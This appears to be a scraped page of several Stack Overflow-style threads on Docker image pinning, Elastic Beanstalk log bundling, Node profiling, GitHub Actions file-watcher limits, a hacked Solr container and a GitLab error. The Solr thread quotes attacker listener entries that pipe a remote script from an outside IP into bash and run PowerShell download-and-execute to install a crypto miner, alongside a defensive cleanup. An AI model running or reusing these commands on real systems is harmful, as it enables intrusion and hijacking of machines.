I was running the very good Linux Server IO Unifi Controller Docker image on my Raspberry Pi 3.
Unfortunately, this image no longer supports ARM32 since 2022-06-01.
I didn't realise this when I ran docker-compose pull to update to the latest image and now my controller won't work with the error message:
unifi-controller | ********************************************************
unifi-controller | ********************************************************
unifi-controller | * *
unifi-controller | * !!!! *
unifi-controller | * This Unifi-Controller image does not support *
unifi-controller | * 32 bit ARM due to a lack of OS packages *
unifi-controller | * *
unifi-controller | * *
unifi-controller | ********************************************************
unifi-controller | ********************************************************
Is there any way to pin docker-compose back to the pre-deprecation version?
When I run docker image ls, I still have the following images available on my system:
REPOSITORY TAG IMAGE ID CREATED SIZE
lscr.io/linuxserver/unifi-controller latest deeabba24529 10 days ago 102MB
lscr.io/linuxserver/unifi-controller <none> 048ec856c236 9 months ago 524MB
lscr.io/linuxserver/unifi-controller <none> 4858fc11dcf2 10 months ago 520MB
Or I could adjust the version in docker-compose.yml to select an old version perhaps.
I understand the risks of running old software but the newer 64 bit Raspberry Pi 4s are out of stock in my country so immediate ability to upgrade hardware is limited and I need access to my network configuration.
Just set the image: configuration for the relevant containers in your docker-compose.yaml to a specific version, e.g:
image: lscr.io/linuxserver/unifi-controller:latest
Use something like:
image: lscr.io/linuxserver/unifi-controller:arm32v7-7.3.76
Or whichever version is appropriate. Using the latest tag is often considered an anti-pattern for exacly this reason -- upgrades to a new major version can break your application stack. In most cases it's better to pin your docker-compose.yml to a specific version.
Most image repositories have a browseable interface for discovering available tags. I'm not familiar with the lscr.io repository, but if there's not a convenient web interface you can use skopeo:
skopeo list-tags docker://lscr.io/linuxserver/unifi-controller
Related
I'm wondering how to do log task customization in the new Elastic Beanstalk platform (the one based on Amazon Linux 2). Specifically, I'm comparing:
Old: Single-container Docker running on 64bit Amazon Linux/2.14.3
New: Single-container Docker running on 64bit Amazon Linux 2/3.0.0
(My question actually has nothing to do with Docker as such, I'm speculating the problem exist for any of the new Elastic Beanstalk platforms).
Previously I could follow Amazon's recipe, meaning put a file into /opt/elasticbeanstalk/tasks/bundlelogs.d/ and it would then be acted upon. This is no longer true.
Has this changed? I can't find it documented. Anyone been successful in doing log task customization on the newer Elastic Beanstalk platform? If so, how?
Minimal working example
I've created a minimal working example and deployed on both platforms.
Dockerfile:
FROM ubuntu
COPY daemon-run.sh /daemon-run.sh
RUN chmod +x /daemon-run.sh
EXPOSE 80
ENTRYPOINT ["/daemon-run.sh"]
Dockerrun.aws.json:
{
"AWSEBDockerrunVersion": "1",
"Logging": "/var/mydaemon"
}
daemon-run.sh:
#!/bin/bash
echo "Starting daemon" # output to stdout
mkdir -p /var/mydaemon/deeperlogs
while true; do
echo "$(date '+%Y-%m-%dT%H:%M:%S%:z') Hello World" >> /var/mydaemon/deeperlogs/app_$$.log
sleep 5
done
.ebextensions/mydaemon-logfiles.config:
files:
"/opt/elasticbeanstalk/tasks/bundlelogs.d/mydaemon-logs.conf" :
mode: "000755"
owner: root
group: root
content: |
/var/log/eb-docker/containers/eb-current-app/deeperlogs/*.log
If I do "Full Logs" action on the old platform I would get a ZIP with my deeperlogs included
inside var/log/eb-docker/containers/eb-current-app. On the new platform I don't.
Investigation
If you look on the disk you'll see that the new Elastic Beanstalk doesn't have a /opt/elasticbeanstalk/tasks folder at all, unlike the old one. Hmm.
On Amazon Linux 2 the folder is:
/opt/elasticbeanstalk/config/private/logtasks/bundle
The .ebextensions/mydaemon-logfiles.config should be:
files:
"/opt/elasticbeanstalk/config/private/logtasks/bundle/mydaemon-logs.conf":
mode: "000644"
owner: root
group: root
content: |
/var/mydaemon/deeperlogs/*.log
container_commands:
append_deeperlogs_to_applogs:
command: echo -e "\n/var/log/eb-docker/containers/eb-current-app/deeperlogs/*" >> /opt/elasticbeanstalk/config/private/logtasks/bundle/applogs
The mydaemon-logfiles.config also adds deeperlogs into applogs file. Without it deeperlogs will not be included in the download log zip bundle. Which is intresting, because the folder will be in the correct location, i.e., /var/log/eb-docker/containers/eb-current-app/deeperlogs/. But without being explicitly listed in applogs, it will be skipped when zip bundle is being generated.
I tested it with single docker environment (3.0.1).
The full log bundle successful contained deeperlogs with correct log data:
Hope that this will help. I haven't found any references for that. AWS documentaiton does not document this, as it is mostly based on Amazon Linux 1, not Amazon Linux 2.
Amazon has fixed this problem in version of the Elastic Beanstalk AL2 platforms released on 04-AUG-2020.
It has been fixed so that log task customization on AL2-based platforms now works the way it has always worked (i.e. on the prevision generation AL2018 platforms) and you can therefore follow the official documentation in order to make this happen.
Succesfully tested with platform "Docker running on 64bit Amazon Linux 2/3.1.0". If you (still) use "Docker running on 64bit Amazon Linux 2/3.0.x" then you must use the undocumented workaround described in Marcin's answer but you are probably better off by upgrading your platform version.
As of 2021/11/05, I tried the accepted answer and various other examples including the latest official documentation on using the .ebextensions folder with *.config files without success.
Most likely something I was doing wrong but here's what worked for me.
The version I'm using: Docker running on 64bit Amazon Linux 2/3.4.8
Simply, add a volume to your docker-compose.yml file to share your application logs to the Elastic Beanstalk log directory.
Example docker-compose.yml:
version: "3.9"
services:
app:
build: .
ports:
- "80:80"
user: root
volumes:
- ./:/var/www/html
# "${EB_LOG_BASE_DIR}/<service name>:<log directory inside container>
- "${EB_LOG_BASE_DIR}/app:/var/www/html/application/logs" # ADD THIS LINE
env_file:
- .env
For more info, here's the documentation I followed.
Hopefully, this helps future readers like myself đź‘Ť
We have a very stateful NodeJS based web server (Meteor) that occasionally, randomly becomes slow in production. The problem is not reproducible in any of our tests, and we don't know what's triggering it.
To diagnose this, we are using the v8-profiler package. This lets us trigger a 10-second CPU profile and download it for offline analysis.
Despite not having received any commits in 3 years, the package used to work fairly well. It has given us compilation trouble in the past, and now it looks like it stopped compiling entirely, breaking our build. The build happens inside a Docker container with all versions pinned, including NodeJS and v8-profiler itself, so it's unlikely that we can fix this on our end.
I'm thinking there must be some alternative, better maintained approach. But where is it?
(Note that restarting the server with additional flags (like --profile) is not an option, because it destroys all the evidence of the problem.)
I found there has been v8-profiler-next which is a successor of v8-profiler.
I hope this works for you.
I just built a tool for this. Called ntop, so it's like "top" but for Node apps https://github.com/DVLP/ntop
The below will enable communication with the CLI. This is designed to not add any overhead when the CLI tool is not used so it can be used in production. The profiler connects/disconnects immediately only when the CLI is doing the profiling.
The app:
import * as ntop from 'ntop'
ntop()
CLI shortcut to get a list of PIDs for convenience:
npx ntop
Outputs PIDs and additionally the command used to create the process for easier recognition.
Process detected at 12345 Details: node ./src/index.js --port 8216
npx ntop 12345
Outputs a list like "Bottom Up" in Chrome Dev Tools
(garbage collector) | 16.101ms |
shift | 10.038ms | node:internal/priority_queue:98:7
(anonymous) | 9.192ms | file:///home/app/src/controllers/Server.js:24:29
utils.bulkPreparePacket | 4.924ms | file:///home/app/src/Utils.js:91:26
preparePacket | 4.776ms | file:///home/app/src/Model.js:98:54
baseGetTag | 1.727ms | file:///home/app/node_modules/lodash/lodash.js:3104:23
(anonymous) | 1.702ms | evalmachine.:3:14
isPrototype | 1.441ms | file:///home/app/node_modules/lodash/lodash.js:6441:24
(program) | 1.411ms |
percolateDown | 1.124ms | node:internal/priority_queue:40:15
I have the follwing error:
Error: ENOSPC: System limit for number of file watchers reached, watch '/home/ runner/work...
I tried all ways to increase the limit (like ulimit -S -n unlimited, sysctl, etc) but seems to not work, neither with sudo
screnshot
My website has a lot of markdown files (~ 80k) used by gatsby to build the final .htmls.
On my machine I need to increase the file limit, of couse, then works. But in the github actions I can't figure out a way to do this.
My github action workflow.yml
name: Build
on: [push, repository_dispatch]
jobs:
update:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout#v1
- name: Increase file limit
run: sudo sysctl -w fs.file-max=65536
- name: Debug
run: ulimit -a
- name: Set Node.js
uses: actions/setup-node#master
with:
node-version: 12.x
- name: Install dependencies
run: npm install
- name: Build
run: npm run build
I think this could be related to this issue: https://github.com/gatsbyjs/gatsby/issues/17321
It sounds like these GitHub/Expo issues might be the problem:
https://github.com/expo/expo-github-action/issues/20
ENOSPC: System limit for number of file watchers reached
https://github.com/expo/expo-cli/issues/277
Handle ENOSPC error (fs.inotify.max_user_watches reached)
Thanks for testing!
I'm afraid this seems to be a GitHub Action
limitation. That docker image is forcing the
fs.inotify.max_user_watches limit to 524288, but apparently GHA is
overwriting this back to 8192. You can see this happen in a fork of
your repo (when we are done, I'll remove the fork ofc, let me know if
you want to have it removed earlier).
Continuing...
Yes, it's related to a limitation of the environment you are running
Expo CLI in. The metro bundler requires a high amount of listeners
apparently. This fails if the host environment is limiting this. So
technically its an environment issue, but I'm not sure if the CLI can
change anything about this.
I find the limit in GitHub Action personally a little low. Like I
tried to outline in an earlier comment on that CLI issue, the
limitation in other CI vendors is actually set to the default max
listeners. Why they did not do this in GH Actions is unclear, that's
what I try to find out. Might be a configurational issue on their
hands, or an intentional limitation.
... And ...
So, there exists a fix, that seemed to work for me when I tried. What
I did was to follow this guys tip: “Increasing the number of
watchers” — #JNYBGR https://link.medium.com/9Zbt3B4pM0
I then did this in my main action.yml With all the specifics
underneath the dev release
steps:
- uses: actions/checkout#v1
- name: Setup kernel for react native, increase watchers
run: echo fs.inotify.max_user_watches=524288 | sudo tee -a /etc/sysctl.conf && sudo sysctl -p
- name: Run dev release fastlane inside docker action
Please let us know if any of this matches your environment/scenario, and if you find a viable workaround.
UPDATE:
The OP tried fs.inotify.max_user_watches=524288 in his .yaml, and now Gatsby is failing with Error: EMFILE: too many open files open '/home/runner/work/virtualizedfy.gatsby, and NodeJS subsequently crashes with an assertion error:
node[3007]: ../src/spawn_sync.cc:460:v8:Maybe<bool> node:SycProcessRunner::TryInitializeAndRunLoop(v8:Local<v8::Value>): Assertion `{uv_loop_init(vu_loop_ == (0)' failed.
ADDITIONAL SUGGESTION:
https://github.com/gatsbyjs/gatsby/issues/12011
Google seems to suggest https://github.com/isaacs/node-graceful-fs as
a drop in replacement for fs, I might also experiment with that to see
if it makes a difference.
EDIT: I can confirm that monkeypatching fs with graceful-fs at the top
of gatsby-node.js as in the snippet below fixes the issue for me.
const realFs = require('fs')
const gracefulFs = require('graceful-fs')
gracefulFs.gracefulify(realFs)
EDIT2: Actually after upgrading from Node 10 to Node 11 everything
seems to be fine without having to patch fs... So all is well!
Prehistory:
My friend's site started to work slowly.
This site uses docker.
htop told me that all cores loaded on 100% by the process /var/tmp/sustes with the user 8983. Tried to find out what is sustes, but Google did not help, but 8983 tells that the problem in Solr container.
Tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
Rolled back to v6.6.4 (as the only available v6 on docker-hub https://hub.docker.com/_/solr/) as site should continue working.
In Dockers logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
"exe":"sh",
"name":"newlistener-02",
"args":[
-"c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code which installs crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find full config, but right now we need just listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings at solrconfig.xml, I found them at /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to Start\Stop - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart docker container.
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and is being fixed in v5.5.5, 6.6.2+, 7.1+
which is due to freely available http://example.com:8983 for anyone, so despite this exploit is fixed, lets...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
This file must be dropped at /opt/solr/server/solr/ (ie next to solr.xml)
As Solr has its own Hash-checker (as a sha256(password+salt) hash), a typical solution can not be used here. The easiest way to generate hash that Ive found is to download jar file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
build: ./dockerfiles/solr/
container_name: solr-container
# Check if 'default' core is created. If not, then create it.
entrypoint:
- docker-entrypoint.sh
- solr-precreate
- default
# Access to web interface from host to container, i.e 127.0.0.1:8983
ports:
- "8983:8983"
volumes:
- ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
- ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes
I'm running an instance of Gitlab Omnibus CE, version 8.15.2, on CentOS 7.3.1611. Upgrading from the 8.14 release family didn't go quite according to plan; since doing that, I've been unable to access the Gitlab browser interface.
When I try to access the browser interface, I can access the login screen and log in, but after I'm logged in, going to any page results in an Error 500: Whoops, something went wrong on our end.
So I used gitlab-ctl tail to grab some log data for what's happening, and it looks like it's a problem with Postgresql's data for one of my projects:
http://pastebin.com/VDMk0eKr
But I'm not sure how I should fix this. Any ideas?
It's known issue that's been fixed with newest release 8.15.3. If you don't want to upgrade GitLab, there is an existing workaround (Edit: as mentioned in comment, the workaround does not always work so consider upgrade primary)
File:
/opt/gitlab/embedded/service/gitlab-rails/app/models/concerns/has_status.rb
Replace
builds = scope.select('count(*)').to_sql
created = scope.created.select('count(*)').to_sql
success = scope.success.select('count(*)').to_sql
pending = scope.pending.select('count(*)').to_sql
running = scope.running.select('count(*)').to_sql
skipped = scope.skipped.select('count(*)').to_sql
canceled = scope.canceled.select('count(*)').to_sql
with
builds = scope.select('count(*)').reorder(nil).to_sql
created = scope.created.select('count(*)').reorder(nil).to_sql
success = scope.success.select('count(*)').reorder(nil).to_sql
pending = scope.pending.select('count(*)').reorder(nil).to_sql
running = scope.running.select('count(*)').reorder(nil).to_sql
skipped = scope.skipped.select('count(*)').reorder(nil).to_sql
canceled = scope.canceled.select('count(*)').reorder(nil).to_sql
And restart GitLab.
I had the same issue and the above didn't work so I ran the following command to downgrade.
To check the current version istalled:
sudo dpkg -l | grep gitlab-ce
To see which versions were available:
sudo apt-cache madison gitlab-ce | less
and the following to "downgrade", since I was at 9.2.0-rc2.ce.0 shown by the above command:
sudo apt-get install gitlab-ce=9.2.0-rc1.ce.0